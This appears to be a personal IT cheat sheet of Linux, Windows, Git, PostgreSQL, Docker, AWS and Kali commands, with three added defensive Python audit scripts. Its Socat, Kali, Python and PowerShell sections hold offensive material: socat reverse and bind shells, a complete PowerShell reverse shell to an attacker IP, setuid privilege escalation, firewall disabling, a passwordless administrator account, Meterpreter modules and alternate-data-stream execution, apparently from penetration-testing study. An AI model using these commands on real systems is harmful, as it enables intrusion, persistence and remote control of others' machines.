Commands to resolve our problems or to facilitate our IT life :)
## Table of Contents

Linux | Windows | Github | PostGreSQL | Docker | AWS | Kali | Python | Powershell
## Linux

Show the existing network routes:

```
ip route
```

Get more information about the network and the connections from the endpoint:

```
netstat -a
```

`netstat -a` shows all listening ports and established connections. `netstat -at` or `netstat -au` list only TCP or UDP sockets respectively.

```
netstat -l
```

`netstat -l` lists ports in "listening" mode: these ports are open and ready to accept incoming connections. Combine it with the `t` option (`netstat -lt`) to list only TCP ports.
Get information about the OS:

```
cat /proc/version
cat /etc/*release
uname -a
cat /etc/issue
```

Get information about the processes running on an endpoint:

```
ps
ps -A
ps axjf
```
Print the environment variables:

```
env
```

Show the current state of system resources such as CPU and RAM:

```
top
```

Find a file by its name:

```
find / -name <name>
```

List the ports in use:

```
netstat -lntu
```

Print the RAM used on our device:

```
free -m
```

Get information about memory and CPU:

```
vmstat
```

and

```
top
```
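The listing above is the raw material for an exposure check: what matters to a defender is which listeners are bound to every interface (`0.0.0.0` or `::`) rather than to loopback. The following parser is an added example, not part of the original cheat sheet; the `SAMPLE_NETSTAT` text is constructed to look like `netstat -lntu` output, and the `Listener` type and function names are my own.

```python
"""Parse `netstat -lntu` style output and flag listeners bound to all interfaces.

Added example, not from the original cheat sheet. SAMPLE_NETSTAT is a constructed
sample; for a live host feed the real output, e.g.
parse_netstat(subprocess.check_output(["netstat", "-lntu"], text=True)).
"""
import ipaddress
from dataclasses import dataclass

# Constructed sample in the layout netstat prints for "only servers".
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp6       0      0 :::8080                 :::*                    LISTEN
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp6       0      0 ::1:323                 :::*
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    address: str
    port: int


def _split_addr(local):
    # "Local Address" is host:port; an IPv6 host itself contains ':' so split on the last one.
    host, _, port = local.rpartition(":")
    return host, int(port)


def parse_netstat(text):
    """Return the listening sockets found in netstat output."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        # Skip the banner and header rows; data rows start with tcp/tcp6/udp/udp6.
        if len(parts) < 4 or not parts[0].startswith(("tcp", "udp")):
            continue
        proto = parts[0]
        host, port = _split_addr(parts[3])
        # TCP rows carry a State column and only LISTEN is a server socket;
        # UDP is connectionless, so netstat prints no state for it.
        if proto.startswith("tcp") and (len(parts) < 6 or parts[5] != "LISTEN"):
            continue
        listeners.append(Listener(proto, host, port))
    return listeners


def is_wildcard(host):
    """True for 0.0.0.0 / :: (and netstat's '*'), i.e. bound on every interface."""
    try:
        return ipaddress.ip_address(host).is_unspecified
    except ValueError:
        return host in ("*", "")


def exposed_listeners(text):
    """Listeners reachable from any interface, the ones worth reviewing first."""
    return [lst for lst in parse_netstat(text) if is_wildcard(lst.address)]


if __name__ == "__main__":
    for lst in exposed_listeners(SAMPLE_NETSTAT):
        print(f"exposed {lst.proto} port {lst.port} bound to {lst.address}")
```

On the sample, the loopback-only PostgreSQL (5432) and chrony (323) listeners are left out and only ports 22, 8080 and 68 are reported.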
Print the list of users of the system:

```
less /etc/passwd
```
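Reading `/etc/passwd` by eye is error-prone on a host with many service accounts. As an added example that is not part of the original cheat sheet, the script below parses the seven-field passwd format and reports the records a defender wants flagged: a second UID 0 account, an empty password field, and a system account with an interactive shell. `SAMPLE_PASSWD` is constructed; the function names are my own.

```python
"""Audit /etc/passwd-style records for accounts that deserve a second look.

Added example, not from the original cheat sheet. SAMPLE_PASSWD is constructed;
run audit_passwd(open("/etc/passwd").read()) on a real host.
"""

# Constructed sample: one legitimate root, two service accounts, one user,
# one extra UID 0 account and one account with an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup2:x:0:0:backup:/tmp:/bin/sh
legacy::1002:1002:Legacy:/home/legacy:/bin/bash
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Parse passwd lines into dicts; raise on malformed records instead of guessing."""
    users = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "passwd": pw, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def audit_passwd(text):
    """Return (account, reason) pairs for records worth investigating."""
    findings = []
    for u in parse_passwd(text):
        if u["uid"] == 0 and u["name"] != "root":
            findings.append((u["name"], "extra UID 0 account"))
        if u["passwd"] == "":
            findings.append((u["name"], "empty password field (no password required)"))
        if u["uid"] < 1000 and u["name"] != "root" and u["shell"] not in NOLOGIN_SHELLS:
            findings.append((u["name"], "system account with interactive shell"))
    return findings


def interactive_users(text):
    """Accounts that can log in interactively (shell not in NOLOGIN_SHELLS)."""
    return [u["name"] for u in parse_passwd(text) if u["shell"] not in NOLOGIN_SHELLS]


if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
```

The UID threshold of 1000 follows the common Debian/Ubuntu split between system and regular accounts; adjust it to the host's `UID_MIN` from `/etc/login.defs` if it differs.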
Find files with the setuid bit set (privileged binaries):

```
find / -perm -u=s -type f 2>/dev/null
```
To create an alias, edit the following file with the editor you like to use; in my case it is "pico":

```
pico ~/.bashrc
```

At the end of the file, add the alias followed by the command you want it to run.

Finally, reload the file:

```
. ~/.bashrc
```

Find the path of a file with a specific name:

```
find -name "file name"
```
Turn off our own terminal's echo, then foreground the shell, which completes the process:

```
stty raw -echo; fg
```

Configure the "interfaces" file with the parameters of our internet connection:

```
sudo pico /etc/network/interfaces
```

Then restart the networking service so the OS applies the new interface settings:

```
sudo /etc/init.d/networking restart
```

Verify which neighbours on the interface are reachable:

```
ip neigh show
```

Erase the contents of a text file:

```
truncate logfile --size 0
```
General commands to erase, move and copy files:

```
cp -a /source/. /dest/
rm -r [folder]/*
```
Looking for privileged (setuid) files in order to escalate with them 🙈

```
find / -perm -4000 2> /dev/null | xargs ls
```
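The two `find -perm` commands above (the `-u=s` form and the `-4000` form) produce the same list, and on the defensive side that list is only useful compared with a baseline: a freshly built host has a known set of setuid binaries, and anything outside it is what an investigation should look at. The following script is an added example, not part of the original cheat sheet; `BASELINE` is a constructed placeholder and the function names are my own.

```python
"""Enumerate setuid/setgid files under a root and diff them against a known baseline.

Added example, not from the original cheat sheet. BASELINE below is a constructed
placeholder; a real one is captured from a clean build of the same image so that
any newly appeared privileged binary stands out.
"""
import os
import stat
import sys

BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}  # constructed placeholder


def is_setuid_or_setgid(mode):
    """True if mode describes a regular file with the setuid or setgid bit set."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def scan_privileged(root):
    """Walk root and return {path: mode} for every setuid/setgid regular file.

    Symlinks are not followed (lstat) and unreadable directories are skipped,
    which mirrors `find / -perm -4000 2>/dev/null`.
    """
    found = {}
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_setuid_or_setgid(st.st_mode):
                found[path] = st.st_mode
    return found


def classify(found, baseline=BASELINE):
    """Split the discovered paths into expected, unexpected and missing-from-baseline."""
    paths = set(found)
    return {
        "expected": sorted(paths & baseline),
        "unexpected": sorted(paths - baseline),
        "missing": sorted(baseline - paths),
    }


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    report = classify(scan_privileged(root))
    for path in report["unexpected"]:
        print("UNEXPECTED setuid/setgid:", path)
    for path in report["missing"]:
        print("in baseline but not found:", path)
```

`missing` is reported as well: a setuid binary that disappeared from the baseline is usually a package change, but it is worth confirming rather than assuming.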
### Reset your password

Enter recovery mode by holding "Shift" before the login screen appears. Once there, remount the root filesystem read-write:

```
mount -n -o remount,rw /
```

Then reset the password of the user:

```
passwd username_here
```

Take the DNS domain name and add it to /etc/hosts:

```
echo <IP> spookysec.local >> /etc/hosts
```
### Socat reverse shells

Target side, connecting back to the listener:

```
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"
```

A fully stable Linux tty reverse shell:

```
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```
### Socat encrypted shells

Generate a self-signed certificate and merge the key and certificate into a single PEM file:

```
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
```

Target (server) side:

```
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
```

Client side:

```
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
```

### Bind shells

```
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
```
## Windows

Use netstat to list the processes by port; for example, the process bound to port 8080:

```
netstat -ano | findstr :8080
```

With the PID of the selected process, kill it:

```
taskkill /PID <PID> /F
```

Print the name and SID of the local user accounts (SAM) on a Windows computer (only from a cmd with administrator privileges):

```
wmic useraccount get name,sid
```

Get a PowerShell prompt from the command line with the execution policy bypassed:

```
powershell -ep bypass
```

Display the status of the firewall:

```
netsh firewall show opmode
```

Turn off the firewall for all the profiles:

```
netsh advfirewall set allprofiles state off
```

Create a new local user:

```
New-LocalUser -Name "Mr.robot" -Description "Description of your new account." -NoPassword
```

Add the new user to the Administrators group:

```
Add-LocalGroupMember -Group "Administrators" -Member "Mr.robot"
```
## Github

List the remote repositories associated with the local .git:

```
git remote -v
```

Sometimes it is necessary to save some local changes and update from the master repository on GitHub without losing the work done. So, first commit the files you need to preserve through the update:

```
git commit [some files]
```

Next, update your local repository with the external changes:

```
git pull origin master
```

To change the email registered locally:

```
git config --global user.email "you@example.com"
```
## PostGreSQL

List all databases:

```
\list
```

or `\l`. List all tables in the current database:

```
\dt
```

Connect to a database:

```
\connect database_name
```

Execute a SQL file in the PostgreSQL environment:

```
psql -f thefile.sql targetdatabase
```

To delete all the tables in the same schema, drop the schema:

```
DROP SCHEMA public CASCADE;
```

To create a new schema:

```
CREATE SCHEMA public;
```

To know which PostgreSQL version is installed in your environment:

```
SELECT version();
```

Show the definition of a view:

```
\d view_name
```
## Docker

List the running Docker containers:

```
docker ps
```

Stop a container by its ID:

```
docker stop container_id
```

Get a shell inside a container:

```
sudo docker exec -i -t docker-id /bin/bash
```

Erase everything that is unused (stopped containers, unused networks, dangling images and build cache):

```
docker system prune
```

## AWS

List our S3 buckets:

```
aws s3 ls
```

## Kali

Inside a Meterpreter session, determine whether we are in a VM:

```
run post/windows/gather/checkvm
```

Check for various exploits that we can run within our session to elevate our privileges:

```
run post/multi/recon/local_exploit_suggester
```
Share a file using an Apache server:

```
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share/
chown -R www-data:www-data /var/www/html/share
service apache2 start
cp /root/Desktop/Backdoor.exe /var/www/html/share/
```

Or serve the current directory with Python's built-in HTTP server:

```
python -m http.server <port>
```
## Python

Upgrade a netcat shell to an interactive TTY using Python's pty module:

```
python -c 'import pty;pty.spawn("/bin/bash")'
```
## Powershell

Compute the MD5 hash of a file:

```
Get-FileHash -Algorithm MD5 file.txt
```

Get information about the Alternate Data Streams (ADS) of a file; ADS allow a file to contain more than one stream of data:

```
Get-Item -Path file.exe -Stream *
```

Get a netcat-style reverse shell:

```
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

Run an executable stored in an alternate data stream:

```
wmic process call create $(Resolve-Path file.exe:streamname)
```